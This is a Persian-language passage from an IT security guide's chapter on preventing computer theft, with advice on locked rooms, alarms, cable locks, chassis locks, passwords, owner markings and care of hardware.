ﺑﺨﺶ ﺩﻭﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﮐﺎﺭﺑﺮﺍﻥ ﻣﻨﻔﺮﺩ
ﺳﺮﻗﺖ ﺭﺍﻳﺎﻧﻪ
ﻓﺼﻞ ﺳﻮﻡ
ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪ ﻭ ﺩﺍﺩﻩﻫﺎ
ﺩﺭ ﺍﻳﻦ ﻓﺼﻞ ﺑﻪ ﺑﺮﺭﺳﻲ ﺭﺍﻫﻬﺎﻳﻲ ﻣﻲﭘﺮﺩﺍﺯﻳﻢ ﻛﻪ ﺍﺯ ﻃﺮﻳﻖ ﺁﻧﻬـﺎ
ﻣﻲﺗﻮﺍﻥ ﺭﺍﻳﺎﻧـﻪ ﺭﺍ ﺍﺯ ﻟﺤـﺎﻅ ﻓﻴﺰﻳﻜـﻲ ﺍﻳﻤـﻦ ﻛـﺮﺩ ﻭ ﺍﺯ ﺳـﺮﻗﺖ
ﺩﺍﺩﻩﻫﺎ ﻭ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺟﻠﻮﮔﻴﺮﻱ ﻧﻤـﻮﺩ .ﻣﺒﺎﺣـﺚ ﻋﻤـﺪﺓ
ﺍﻳﻦ ﻓﺼﻞ ﻋﺒﺎﺭﺗﻨﺪ ﺍﺯ :ﺍﻣﻨﻴﺖ ﻓﻴﺰﻳﻜﻲ ،ﻧﺴﺨﻪﻫـﺎﻱ ﭘـﺸﺘﻴﺒﺎﻥ ،ﻭ
ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻧﺎﻡ ﻛﺎﺭﺑﺮﻱ ﻭ ﺭﻣﺰ ﻋﺒﻮﺭ.
ﻣﻘﺪﻣﻪ
ﻗﺎﻧﻮﻥ ﺍﻭﻝ:
ﻗﺒﻞ ﺍﺯ ﻭﻗﻮﻉ ﺳﺮﻗﺖ ،ﺑﻪ ﺁﻥ ﺭﺍﻳﺎﻧﻪ ﻓﻜﺮ ﻛﻨﻴﺪ.
ﺑﻪ ﺳﺮﻗﺖ ﺭﻓﺘﻦ ﺭﺍﻳﺎﻧﻪ ﺑﺴﻴﺎﺭ ﺁﺯﺍﺭ ﺩﻫﻨﺪﻩ ﺍﺳﺖ ﻭ ﭼﻨﺎﻧﭽـﻪ ﺑﻴﻤـﻪ
ﻧﺒﺎﺷﻴﺪ ﻫﺰﻳﻨﺔ ﮔﺰﺍﻓﻲ ﺭﺍ ﺑﺮ ﺷﻤﺎ ﺗﺤﻤﻴﻞ ﺧﻮﺍﻫﺪ ﻛﺮﺩ .ﺩﺭ ﺑﻌـﻀﻲ
ﻣﻮﺍﻗﻊ ﺳﺮﻗﺖ ﺍﻃﻼﻋﺎﺕ ﺑﺎﻋﺚ ﺍﻓﺸﺎﻱ ﺍﻣﻮﺭ ﺷـﻐﻠﻲ ﻭ ﻳـﺎ ﺍﺳـﺮﺍﺭ
ﻣﺤﺮﻣﺎﻧﺔ ﺍﺷﺨﺎﺹ ﻣﻲﮔﺮﺩﺩ ﻭ ﺩﺭ ﺷﺮﺍﻳﻂ ﺑـﺪﺗﺮ ،ﺳـﺮﻗﺖ ﺭﺍﻳﺎﻧـﻪ
ﺑﺎﻋﺚ ﺍﺯ ﺩﺳﺖ ﺩﺍﺩﻥ ﺷﻐﻞ ﻣﻲﺷﻮﺩ .ﺑﺎ ﺍﻳﻨﺤﺎﻝ ﭼﻨﺎﻧﭽـﻪ ﺩﺭ ﺍﻳـﻦ
ﺧﺼﻮﺹ ﭼﻨـﺪ ﺭﻭﺵ ﺳـﺎﺩﻩ ﻭ ﺍﺭﺯﺍﻥﻗﻴﻤـﺖ ﺑﻜـﺎﺭ ﮔﺮﻓﺘـﻪ ﺷـﻮﺩ
ﻣﻲ ﺗﻮﺍﻥ ﺍﺯ ﺳﺮﻗﺖ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺭﻭﻣﻴﺰﻱ ﻭ ﻛﻴﻔﻲ ﺟﻠﻮﮔﻴﺮﻱ ﻛـﺮﺩ
ﻳﺎ ﺣﺪﺍﻗﻞ ﺍﺣﺘﻤﺎﻝ ﺁﻧﺮﺍ ﺑﻪ ﻣﻴﺰﺍﻥ ﻗﺎﺑﻞ ﺗﻮﺟﻬﻲ ﻛﺎﻫﺶ ﺩﺍﺩ.
ﻳﻜﻲ ﺍﺯ ﺑﻬﺘـﺮﻳﻦ ﺷـﻴﻮﻩﻫـﺎﻱ ﺩﺭﻙ ﻣﻔﻬـﻮﻡ ﺍﻣﻨﻴـﺖ ﺍﻃﻼﻋـﺎﺕ
ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻳﻚ ﺭﺍﻫﻜﺎﺭ ﺿﺎﺑﻄﻪﻣﻨﺪ ١٣ﺍﺳﺖ .ﺑﺎ ﺷـﺮﻭﻉ ﺍﺯ ﻣﻌﺮﻓـﻲ
ﺍﻣﻨﻴﺖ ﻓﻴﺰﻳﻜﻲ ﺩﺭ ﺍﻳﻦ ﻓﺼﻞ ،ﺩﺭ ﺳﺎﻳﺮ ﻓـﺼﻮﻝ ﺑﺨـﺶ ﺩﻭﻡ ﺑـﻪ
ﺑﺮﺭﺳﻲ ﺟﻮﺍﻧﺐ ﺩﻳﮕﺮ ﺍﻣﻨﻴﺖ ﺧﻮﺍﻫﻴﻢ ﭘﺮﺩﺍﺧﺖ ﻭ ﺍﺳﺎﺱ ﺍﺳـﺘﻘﺮﺍﺭ
ﻓﺮﺁﻳﻨﺪﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺑـﺮﺍﻱ ﺭﺍﻳﺎﻧـﻪﻫـﺎﻱ ﺷﺨـﺼﻲ ﻭ ﮔـﺮﻭﻩﻫـﺎﻱ
ﻛﻮﭼﻚ ﺭﺍﻳﺎﻧﻪ ﺍﻱ ﺭﺍ ﺗﻮﺿﻴﺢ ﺧﻮﺍﻫﻴﻢ ﺩﺍﺩ .ﺍﻃﻼﻋﺎﺕ ﻣﺮﺑـﻮﻁ ﺑـﻪ
ﺟﻨﺒﻪ ﻫﺎﻱ ﻓﻨﻲ ﺍﻣﻨﻴـﺖ ﺑـﺮﺍﻱ ﺳـﺎﺯﻣﺎﻧﻬﺎﻱ ﺑﺰﺭﮔﺘـﺮ ﻭ ﻛـﺎﺭﺑﺮﺍﻥ
ﺣﺮﻓـﻪﺍﻱ ﺩﺭ ﺑﺨـﺶ ﭘــﻨﺠﻢ ﺍﺭﺍﺋــﻪ ﺷــﺪﻩ ﺍﺳــﺖ .ﻫﻨﮕﺎﻣﻴﻜــﻪ ﺑــﺎ
ﺍﻃﻼﻋﺎﺕ ﺍﺭﺍﺋﻪﺷﺪﻩ ﺩﺭ ﺍﻳﻦ ﻓﺼﻞ ﺑﺎ ﻛﻠﻴﺎﺕ ﻣﻮﺿﻮﻉ ﺁﺷﻨﺎ ﺷـﺪﻳﺪ،
ﻣﻲﺗﻮﺍﻧﻴﺪ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻣﻄﺎﻟﺐ ﺍﺭﺍﺋﻪ ﺷﺪﻩ ﺩﺭ ﺑﺨﺶ ﭘﻨﺠﻢ )ﺍﻣﻨﻴﺖ
ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ( ﺑﺮ ﺩﺍﻧﺶ ﻓﻨﻲ ﺧﻮﺩ ﺑﻴﺎﻓﺰﺍﻳﻴﺪ.
ﻛﺎﺭﻱ ﻛﻨﻴﺪ ﻛﻪ ﺳﺮﻗﺖ ﺭﺍﻳﺎﻧﻪ ﺩﺷﻮﺍﺭ ﺷﻮﺩ
ﺍﻣﻨﻴﺖ ﻓﻴﺰﻳﻜﻲ
ﭼﻨﺪ ﺭﺍﻩ ﺑﺮﺍﻱ ﺩﺷﻮﺍﺭ ﻛﺮﺩﻥ ﺳﺮﻗﺖ ﺭﺍﻳﺎﻧﻪ ﻭﺟﻮﺩ ﺩﺍﺭﺩ:
ﺍﻭﻟﻴﻦ ﻣﺮﺣﻠﻪ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﺍﻃﻤﻴﻨﺎﻥ ﺣﺎﺻﻞ ﻛﻨﻴﺪ ﺭﺍﻳﺎﻧﺔ ﺷـﻤﺎ ﺍﺯ
ﻟﺤﺎﻅ ﻓﻴﺰﻳﻜﻲ ﺍﻳﻤﻦ ﺍﺳﺖ .ﺍﻳﻦ ﻣﺮﺣﻠﻪ ﻣﻤﻜﻦ ﺍﺳـﺖ ﺑـﺴﺘﻪ ﺑـﻪ
ﺍﻳﻨﻜﻪ ﺭﺍﻳﺎﻧﻪ ﺧﻮﺩ ﺭﺍ ﺩﺭ ﻛﺠـﺎ ﻗـﺮﺍﺭ ﺩﺍﺩﻩﺍﻳـﺪ ﻳـﺎ ﺍﻳﻨﻜـﻪ ﺭﺍﻳﺎﻧـﻪ ﻭ
ﺩﺍﺩﻩﻫﺎ ﺍﺯ ﭼﻪ ﺣﺴﺎﺳﻴﺘﻲ ﺑﺮﺧﻮﺭﺩﺍﺭ ﻫﺴﺘﻨﺪ ﻳﻚ ﻗﺴﻤﺖ ﺟﺰﺋﻲ ﻳﺎ
ﻳﻚ ﻗﺴﻤﺖ ﺑﺴﻴﺎﺭ ﻣﻬﻢ ﻣﺤﺴﻮﺏ ﺷﻮﺩ.
Rule-Based Approach
13
ﺩﻭ ﺭﺍﻫﻜﺎﺭ ﺑﺮﺍﻱ ﭘﻴﺸﮕﻴﺮﻱ ﺍﺯ ﺩﺯﺩﻱ ﺭﺍﻳﺎﻧـﻪ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ :ﻛـﺎﺭﻱ
ﻛﻨﻴﺪ ﻛﻪ ﺳﺮﻗﺖ ﺭﺍﻳﺎﻧﻪ ﺩﺷﻮﺍﺭ ﺷﻮﺩ؛ ﻭ ﻳﺎ ﻛﺎﺭﻱ ﻛﻨﻴﺪ ﻛﻪ ﻣﻴﻞ ﺑﻪ
ﺩﺯﺩﻳﺪﻥ ﺭﺍﻳﺎﻧﻪ ﻛﺎﻫﺶ ﻳﺎﺑﺪ.
•
ﺍﻃﻤﻴﻨﺎﻥ ﺣﺎﺻﻞ ﻛﻨﻴﺪ ﻛﻪ ﻣﺤﻞ ﻧﮕﻬـﺪﺍﺭﻱ ﺭﺍﻳﺎﻧـﻪ ﺍﻣـﻦ
ﺍﺳﺖ .ﺑﺮﺍﻱ ﻧﮕﻬﺪﺍﺭﻱ ﺍﺯ ﺭﺍﻳﺎﻧﻪ ﺑﺎﻳﺪ ﺍﺯ ﺁﻥ ﺩﺭ ﻳـﻚ ﺍﺗـﺎﻕ
ﻗﻔﻠﺪﺍﺭ ﻧﮕﻬﺪﺍﺭﻱ ﻧﻤﺎﻳﻴﺪ ﻭ ﻳﺎ ﺍﮔﺮ ﺩﺭ ﻣﺤﻞ ﻛـﺎﺭ ﺧـﻮﺩ ﺑـﺎ
ﻫﻤﻜﺎﺭﺍﻥ ﺩﻳﮕﺮﻱ ﻛﺎﺭ ﻣﻲﻛﻨﻴﺪ ﺭﺍﻳﺎﻧﻪ ﺭﺍ ﺩﺭ ﻣﻌﺮﺽ ﺩﻳـﺪ
ﺁﻧﺎﻥ ﻗﺮﺍﺭ ﺩﻫﻴﺪ .ﺭﺍﻳﺎﻧﻪ ﺧﻮﺩ ﺭﺍ ﺩﺭ ﻣﺤﺎﻓﻞ ﻋﻤﻮﻣﻲ ﻣﺎﻧﻨـﺪ
ﻓﺮﻭﺩﮔﺎﻩﻫﺎ ﺑﺪﻭﻥ ﻣﺮﺍﻗﺒﺖ ﺭﻫﺎ ﻧﻜﻨﻴﺪ.
•
ﺍﮔﺮ ﺗﺼﻮﺭ ﻣﻲﻛﻨﻴﺪ ﻛﻪ ﺩﺭ ﺯﻣـﺎﻥ ﻋـﺪﻡ ﺣـﻀﻮﺭ ﺷـﻤﺎ ﺩﺭ
ﻣﺤﻞ ﻛﺎﺭﺗﺎﻥ ﻣﻤﻜﻦ ﺍﺳـﺖ ﺷﺨـﺼﻲ ﺷـﺒﺎﻧﻪ ﻭﺍﺭﺩ ﺍﺗـﺎﻕ
ﺑﺨﺶ ﺩﻭﻡ
ﻛﻠﻴﺎﺕ
ﺳﺮﻗﺖ ﺭﺍﻳﺎﻧﻪﻫﺎ ﻣﺸﻜﻠﻲ ﺭﻭ ﺑﻪ ﺭﺷﺪ ﺍﺳﺖ .ﺭﺍﻳﺎﻧﻪﻫـﺎ ﻭ ﺧـﺼﻮﺻﹰﺎ
ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﻛﻴﻔﻲ ﺑﻪ ﺳﺎﺩﮔﻲ ﺩﺯﺩﻳﺪﻩ ﻣﻲﺷـﻮﻧﺪ ﻭ ﺑـﺴﻴﺎﺭ ﺳـﺨﺖ
ﭘﻴﺪﺍ ﻣﻲﺷﻮﻧﺪ .ﭼﻨﺎﻧﭽﻪ ﺳﺎﺭﻕ ﻣﺎﻳﻞ ﺑﻪ ﺍﺳﺘﻔﺎﺩﺓ ﺷﺨﺼﻲ ﺍﺯ ﺭﺍﻳﺎﻧﻪ
ﻧﺒﺎﺷﺪ ﻣﺮﺍﻛﺰ ﺑﺴﻴﺎﺭ ﺯﻳﺎﺩﻱ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ ﻛﻪ ﺭﺍﻳﺎﻧـﻪﻫـﺎﻱ ﺩﺯﺩﻱ ﻭ
ﺩﺳﺖﺩﻭﻡ ﺭﺍ ﺧﺮﻳﺪﺍﺭﻱ ﻣـﻲﻛﻨﻨـﺪ .ﺑﺮﺧـﻲ ﺍﺯ ﺳـﺎﺭﻗﺎﻥ ،ﺭﺍﻳﺎﻧـﻪ ﻭ
ﻧﻤﺎﻳﺸﮕﺮ ﺁﻧﺮﺍ ﺑﻄﻮﺭ ﻛﺎﻣﻞ ﺑﻪ ﺳﺮﻗﺖ ﻧﻤﻲﺑﺮﻧﺪ ﺑﻠﻜـﻪ ﻗـﺴﻤﺘﻬﺎﻱ
ﻣﻬﻢ ﺁﻥ ﻣﺎﻧﻨﺪ ﺣﺎﻓﻈﻪ ﻭ ﭘﺮﺩﺍﺯﺷﮕﺮ ﺭﺍ ﻣﻲﺩﺯﺩﻧﺪ .ﺑﺎﻳﺪ ﮔﻔـﺖ ﻛـﻪ
ﻫﺮ ﺩﻭ ﻣﻮﺭﺩ ﺑﺎﺯﺍﺭ ﺧﻮﺑﻲ ﺩﺍﺭﻧـﺪ ﻭ ﺣﻤـﻞ ﻭ ﻧﻘﻠـﺸﺎﻥ ﻧﻴـﺰ ﺁﺳـﺎﻥ
ﺍﺳﺖ ،ﺍﻣﺎ ﭘﻴﺪﺍ ﻛﺮﺩﻧﺸﺎﻥ ﺍﮔﺮ ﭼﻪ ﻏﻴﺮﻣﻤﻜﻦ ﻧﻴﺴﺖ ﻭﻟـﻲ ﺑـﺴﻴﺎﺭ
ﺩﺷﻮﺍﺭ ﻣﻲﺑﺎﺷﺪ.
٥٦
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ
ﺷﺪﻩ ﻭ ﺭﺍﻳﺎﻧﻪ ﺭﺍ ﺑﻪ ﺳﺮﻗﺖ ﺑﺒـﺮﺩ ﺍﺯ ﺳﻴـﺴﺘﻢ ﺁﮊﻳـﺮ ﺧﻄـﺮ
ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ.
•
ﺟﻬﺖ ﺍﻳﺠﺎﺩ ﺍﻳﻤﻨﻲ ،ﺭﺍﻳﺎﻧﺔ ﺧﻮﺩ ﺭﺍ ﺑﻮﺳﻴﻠﺔ ﻛﺎﺑﻞ ﺳﻴﻤﻲ ﻭ
ﻳﺎ ﺯﻧﺠﻴﺮ ﺑﻪ ﻣﻴﻠﻪ ،ﻟﻮﻟﻪ ﻳﺎ ﺍﺷﻴﺎﻳﻲ ﻛﻪ ﻗﺎﺑﻠﻴـﺖ ﺟﺎﺑﺠـﺎﻳﻲ
ﻧﺪﺍﺭﻧﺪ ﻣﺘـﺼﻞ ﻛﻨﻴـﺪ .ﺍﺯ ﺍﻳـﻦ ﺭﻭﺵ ﺩﺭ ﻣﺤﺎﻓـﻞ ﻧـﺴﺒﺘﹰﺎ
ﻋﻤﻮﻣﻲ ﻣﺜﻞ ﻣﺪﺍﺭﺱ ﻭ ﻳﺎ ﻛﺘﺎﺑﺨﺎﻧﻪ ﻫﺎ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷـﻮﺩ.
ﺍﻛﺜﺮ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺩﺍﺭﺍﻱ ﻣﺤﻠﻲ ﻣﺨﺼﻮﺹ ﺍﺗﺼﺎﻝ ﻣﻲﺑﺎﺷـﻨﺪ.
ﻻ ﺩﺍﺭﺍﻱ ﻛﺎﺑﻠﻬﺎ ﻭ
ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﻛﻴﻔﻲ ﻧﻴﺰ ﺑﺮﺍﻱ ﺍﻳﻨﻜﺎﺭ ﻣﻌﻤﻮ ﹰ
ﻗﻔﻠﻬﺎﻱ ﺑﺨﺼﻮﺻﻲ ﻫﺴﺘﻨﺪ.
•
ﭼﻨﺎﻧﭽﻪ ﺭﺍﻳﺎﻧﻪ ﺩﺍﺭﺍﻱ ﻗﻔﻠﻲ ﻣـﻲﺑﺎﺷـﺪ ﻛـﻪ ﺍﺯ ﺑـﺎﺯ ﺷـﺪﻥ
ﺑﺪﻧﻪ ١٤ﺟﻠﻮﮔﻴﺮﻱ ﻣﻲ ﻛﻨﺪ ﺍﺯ ﺁﻥ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﺎﻳﻴﺪ .ﻣﻲﺗﻮﺍﻥ
ﺍﺯ ﭘﻴﭽﻬﺎﻱ ﻣﺨـﺼﻮﺹ ﻛـﻪ ﺑﺮﺍﺣﺘـﻲ ﻗﺎﺑـﻞ ﺑـﺎﺯ ﻛـﺮﺩﻥ
ﻧﻴﺴﺘﻨﺪ ﻧﻴﺰ ﺑﺮﺍﻱ ﺍﻳﻦ ﻣﻨﻈﻮﺭ ﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩ.
•
ﭼﻨﺎﻧﭽﻪ ﺍﻃﻼﻋـﺎﺕ ﺍﺭﺯﺷـﻤﻨﺪﻱ )ﻣﺜـﻞ ﺩﺍﺩﻩﻫـﺎﻱ ﻛـﺎﺭﻱ ﻳـﺎ
ﺍﻃﻼﻋﺎﺕ ﺷﺨﺼﻲ( ﺩﺭ ﺭﺍﻳﺎﻧﺔ ﺷﻤﺎ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ ،ﻻﺯﻡ ﺍﺳـﺖ
ﺯﻣﺎﻧﻲ ﻛﻪ ﺁﻧﺮﺍ ﺑﺪﻭﻥ ﻣﺮﺍﻗﺒـﺖ ﻗـﺮﺍﺭ ﺩﺍﺩﻩ ﻭ ﻳـﺎ ﺍﺯ ﺁﻥ ﺩﻭﺭ
ﻫﺴﺘﻴﺪ )ﻣﺜ ﹰﻼ ﺍﮔﺮ ﺍﺯ ﻫﺘﻞ ﺧﺎﺭﺝ ﻣﻲﺷﻮﻳﺪ ﻭ ﺭﺍﻳﺎﻧﻪ ﺩﺭ ﺍﺗﺎﻕ ﺍﺳـﺖ(
ﺍﻣﻜﺎﻥ ﺩﺳﺘﺮﺳﻲ ﻣﻨﻄﻘﻲ ١٥ﺑﻪ ﺁﻧﺮﺍ ﺗﺎ ﺣﺪ ﻣﻤﻜﻦ ﻛـﺎﻫﺶ
ﺩﻫﻴﺪ .ﺩﺳﺘﺮﺳﻲ ﻣﻨﻄﻘﻲ ﺑـﻪ ﻣﻌﻨـﺎﻱ ﺍﺳـﺘﻔﺎﺩﺓ ﻭﺍﻗﻌـﻲ ﺍﺯ
ﺭﺍﻳﺎﻧﻪ ﺩﺭ ﺯﻣﺎﻧﻲ ﺍﺳﺖ ﻛﻪ ﺍﻣﻜﺎﻥ ﺩﺳﺘﺮﺳﻲ ﻓﻴﺰﻳﻜـﻲ ﺑـﻪ
ﺁﻥ ﻭﺟﻮﺩ ﺩﺍﺭﺩ .ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺭﻣﺰﻫـﺎﻱ ﻋﺒـﻮﺭ ﻣـﺴﺘﺤﻜﻢ ﻭ
ﻣﺤﺎﻓﻈﻬﺎﻱ ﺻﻔﺤﻪﻧﻤـﺎﻳﺶ ﻣﺠﻬـﺰ ﺑـﻪ ﺭﻣﺰﻫـﺎﻱ ﻋﺒـﻮﺭ
ﮔﺰﻳﻨﻪﻫﺎﻱ ﻣﻨﺎﺳﺒﻲ ﺑﺮﺍﻱ ﺷـﺮﻭﻉ ﺍﻳـﻦ ﻧـﻮﻉ ﺍﺯ ﺣﻔﺎﻇـﺖ
ﻫﺴﺘﻨﺪ )ﺑﺮﺍﻱ ﺍﻃﻼﻋﺎﺕ ﺑﻴﺸﺘﺮ ﺑﻪ ﺑﺤﺚ ﻣﺮﺑﻮﻁ ﺑﻪ ﻣﺠﻮﺯ ﻭﺭﻭﺩ ﺩﺭ
ﻫﻤﻴﻦ ﻓﺼﻞ ﺭﺟﻮﻉ ﻛﻨﻴﺪ(.
•
ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﻛﻴﻔﻲ ﻭ PDAﻫﺎ ١٦ﻛﻮﭼﻚ ﻣﻲﺑﺎﺷـﻨﺪ ﻭ ﺑـﻪ
ﻫﻤﻴﻦ ﺩﻟﻴﻞ ﺩﺯﺩﻳﺪﻥ ﺁﻧﻬﺎ ﺁﺳﺎﻥ ﺍﺳـﺖ .ﭼﻨﺎﻧﭽـﻪ ﺍﺯ ﺁﻧﻬـﺎ
ﺍﺳﺘﻔﺎﺩﺓ ﺯﻳﺎﺩﻱ ﻧﻤﻲﻛﻨﻴـﺪ ﺣﺘﻤـﹰﺎ ﺁﻧﻬـﺎ ﺭﺍ ﺍﺯ ﻣﺤـﻴﻂ ﻛـﺎﺭ
ﺧﺎﺭﺝ ﻧﻤﺎﻳﻴﺪ.
ﻛﺎﺭﻱ ﻛﻨﻴﺪ ﻛﻪ ﻣﻴﻞ ﺑﻪ ﺩﺯﺩﻳﺪﻥ ﺭﺍﻳﺎﻧﻪ ﻛﺎﻫﺶ ﻳﺎﺑﺪ
ﺍﻓﺮﺍﺩﻱ ﻛﻪ ﻣﺎﻳﻞ ﺑﻪ ﺧﺮﻳﺪ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺩﺳـﺖ ﺩﻭﻡ ﺑﺎﺷـﻨﺪ ﺑـﺴﻴﺎﺭ
ﺍﻧﺪﻙ ﻫﺴﺘﻨﺪ ،ﺧﺼﻮﺻﹰﺎ ﺍﮔﺮ ﻣـﺸﺨﺺ ﺑﺎﺷـﺪ ﻛـﻪ ﺭﺍﻳﺎﻧـﻪ ﺩﺯﺩﻱ
ﺍﺳﺖ .ﺑﻬﺘﺮﻳﻦ ﻭ ﺍﺭﺯﺍﻧﺘﺮﻳﻦ ﺭﻭﺵ ﺑﺮﺍﻱ ﺍﻳﻨﻜﻪ ﺳﺎﺭﻗﺎﻥ ﺗﻤﺎﻳﻠﻲ ﺑﻪ
ﺩﺯﺩﻳﺪﻥ ﺭﺍﻳﺎﻧﻪ ﻧﺪﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﻣﺸﺨـﺼﺎﺕ ﺧـﻮﺩ ﺭﺍ
ﺑﺎ ﻋﻼﺋﻢ ﺛﺎﺑﺖ ﻭ ﻣﺎﻧﺪﮔﺎﺭ ﻛﻪ ﻧﻤﻲﺗﻮﺍﻥ ﺁﻧﻬﺎ ﺭﺍ ﺍﺯ ﺑﻴﻦ ﺑﺮﺩ ﺑﺮ ﺑﺪﻧﺔ
ﺭﺍﻳﺎﻧﻪ ﺣﻚ ﻭ ﻳﺎ ﻧﻘﺎﺷﻲ ﻛﻨﻴﺪ .ﺍﻳﻦ ﺍﻃﻼﻋـﺎﺕ ﻣـﻲﺗﻮﺍﻧـﺪ ﺷـﺎﻣﻞ
ﺍﺳﻢ ﻳﺎ ﻣﺸﺨﺼﺎﺕ ﺩﻳﮕﺮ ﺑﺎﺷﺪ .ﺩﻗﺖ ﺩﺍﺷﺘﻪ ﺑﺎﺷـﻴﺪ ﻛـﻪ ﺍﺯ ﺍﻳـﻦ
ﻧﻮﻉ ﻋﻼﻣﺘﻬﺎ ﺩﺭ ﻗـﺴﻤﺖ ﺷـﻜﺎﻑ ﺗﻬﻮﻳـﻪ ﻳـﺎ ﺷـﻜﺎﻓﻬﺎﻱ ﺩﻳﮕـﺮ
ﺍﺳــﺘﻔﺎﺩﻩ ﻧﻨﻤﺎﻳﻴــﺪ .ﻫﻤﭽﻨــﻴﻦ ﺁﮔــﺎﻩ ﺑﺎﺷــﻴﺪ ﻛــﻪ ﮔــﺎﻫﻲ ﺍﻭﻗــﺎﺕ
ﻋﻼﻣﺘﮕﺬﺍﺭﻱ ﺭﻭﻱ ﺑﺪﻧﻪ ﻣﻲﺗﻮﺍﻧﺪ ﺑﺎﻋﺚ ﺍﺑﻄﺎﻝ ﺿﻤﺎﻧﺘﻨﺎﻣﻪ ﮔﺮﺩﺩ.
ﺭﺍﻳﺎﻧﻪﻫﺎ ﺁﺳﻴﺐﭘﺬﻳﺮﻧﺪ
ﺭﺍﻳﺎﻧﻪﻫﺎ ﻧﺴﺒﺖ ﺑـﻪ ﮔـﺮﺩ ﻭ ﺧـﺎﻙ ﻭ ﺳـﻄﻮﺡ ﻧـﺎﻫﻤﻮﺍﺭ ﺣـﺴﺎﺱ
ﻫﺴﺘﻨﺪ .ﭼﻨﺎﻧﭽﻪ ﻛﺎﺭﻛﺮﺩﻥ ﺑﺎ ﺭﺍﻳﺎﻧﻪ ﺩﺭ ﻣﺤﻠﻲ ﺻﻮﺭﺕ ﺑﮕﻴﺮﺩ ﻛـﻪ
ﮔﺮﺩ ﻭ ﺧﺎﻙ ﺩﺭ ﺁﻧﺠﺎ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻣﺮﺗﺒﹰﺎ ﺑﺎﻳﺪ ﺑـﺎ ﺩﻗـﺖ ﺯﻳـﺎﺩ ﺁﻧـﺮﺍ
ﺗﻤﻴﺰ ﻛﺮﺩ ﺗﺎ ﺷـﻜﺎﻑ ﺗﻬﻮﻳـﻪ ﻣـﺴﺪﻭﺩ ﻧـﺸﻮﺩ .ﺑﺮﺧـﻲ ﺭﺍﻳﺎﻧـﻪﻫـﺎ
ﻫﻤﭽﻨﻴﻦ ﻧﺴﺒﺖ ﺑﻪ ﻓﺮﻭﺭﻓﺘﮕﻴﻬـﺎ ﻭ ﺑﺮﺁﻣـﺪﮔﻴﻬﺎﻱ ﺳـﻄﺤﻲ ﻛـﻪ
ﺭﻭﻱ ﺁﻥ ﻗﺮﺍﺭ ﺩﺍﺭﻧﺪ ﻧﻴﺰ ﺣﺴﺎﺱ ﻣﻲﺑﺎﺷﻨﺪ.
ﺟﻨﺒﻪﻫﺎﻱ ﺩﻳﮕﺮ ﺍﻣﻨﻴﺖ ﻓﻴﺰﻳﻜﻲ
ﭼﻨﺎﻧﭽﻪ ﺷﻤﺎ ﺑﺮﺍﻱ ﻧﺼﺐ ﻳﻚ ﻗﻄﻌﻪ ﺳﺨﺖﺍﻓﺰﺍﺭﻱ ﺑﺪﻧـﺔ ﺭﺍﻳﺎﻧـﻪ
ﺧﻮﺩ ﺭﺍ ﺑﺎﺯ ﻛﺮﺩﻩﺍﻳﺪ ﺑﺎﻳﺪ ﺑﻪ ﺍﺧﻄﺎﺭﻫـﺎﻳﻲ ﻛـﻪ ﺩﺭﺑـﺎﺭﺓ ﺷـﻮﻛﻬﺎﻱ
ﺍﻟﻜﺘﺮﻭﺍﺳﺘﺎﺗﻴﻚ ﺩﺍﺩﻩ ﺷﺪﻩ ﺗﻮﺟﻪ ﻛﻨﻴﺪ )ﺷﻮﻙ ﺍﻟﻜﺘﺮﻭﺍﺳﺘﺎﺗﻴﻚ ﺑﺎﻋـﺚ
ﺻﺪﻣﻪﺩﻳﺪﻥ ﺳﺨﺖﺍﻓﺰﺍﺭ ﻣﻲﺷﻮﺩ ﻭ ﺑﺎﻳﺪ ﺍﺯ ﻭﻗﻮﻉ ﺁﻥ ﺟﻠﻮﮔﻴﺮﻱ ﻛﺮﺩ( .ﺿﻤﻨﹰﺎ
ﺗﻮﺟﻪ ﻛﻨﻴﺪ ﻛﻪ ﺑﺮﺍﻱ ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﺑﺮﻕﮔﺮﻓﺘﮕﻲ ﻻﺯﻡ ﺍﺳﺖ ﺑـﺪﻥ
ﺷﻤﺎ ﺑﺎ ﺯﻣﻴﻦ ﺩﺭ ﺗﻤﺎﺱ ﺩﺍﺋﻢ ﺑﺎﺷﺪ.
ﺑﺮﺍﻱ ﻣﺤﺎﻓﻈﺖ ﺍﺯ ﺩﺍﺩﻩﻫﺎﻱ ﺧﻮﺩ
ﻧﺴﺨﻪﻫﺎﻱ ﭘﺸﺘﻴﺒﺎﻥ ١٧ﺗﻬﻴﻪ ﻧﻤﺎﻳﻴﺪ
